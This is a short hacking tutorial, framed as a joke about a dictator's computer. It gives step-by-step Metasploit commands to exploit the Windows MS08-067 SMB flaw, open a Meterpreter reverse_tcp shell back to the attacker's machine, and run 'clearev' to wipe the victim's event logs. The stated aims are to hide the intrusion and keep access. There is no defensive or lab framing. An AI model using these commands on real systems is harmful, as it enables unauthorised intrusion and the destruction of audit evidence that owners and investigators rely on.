Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected
Welcome back, my greenhorn hackers!
Congratulations on your successful hack that saved the world from nuclear annihilation from our little, bellicose, Twinkie-eating dictator. The rest of world may not know what you did, but I do. Good job!
Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.
So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.
Let's start with the same hack we used to get into the dictator's computer initially:
But instead of using the VNC payload, we will load the Meterpreter payload. Type:
- msf> use exploit/windows/smb/ms08_067_netapi
Before we move on, let's learn a bit more about this exploit. Type:
- msf exploit(ms08_067_netapi) info
This should bring a screenshot below that provides us with some basic information about this exploit. We can see that this hack exploits a parsing flaw in the netapi dll. In this way, we can place our own payload on the system, which in this case is the Meterpreter.
Now we load the payload by typing:
- msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp
Now that we have the exploit and payload set, we need to set the options. In this case, we need to set our LHOST (us, the attacker) and the RHOST (the victim, our belligerent dictator's computer) IP addresses. Simply type in the IP address of your computer and of his computer.
Now that we have everything set to take control, we just type:
- msf exploit(ms08_067_netapi) exploit
If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!
At the meterpreter prompt, we now type:
- meterpreter > clearev
As you can see in the screenshot above, this command proceeds to clear the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could see the event logs on his computer, we will see that all events have been cleared.
This is critical both to protect our being found out, but also that we continue to have access to his computer. Once they know that someone has hacked his computer, it's likely they will take measures to prevent our returning to it.
Now, make sure to come back for more hacking fun and games on our dictator's computer!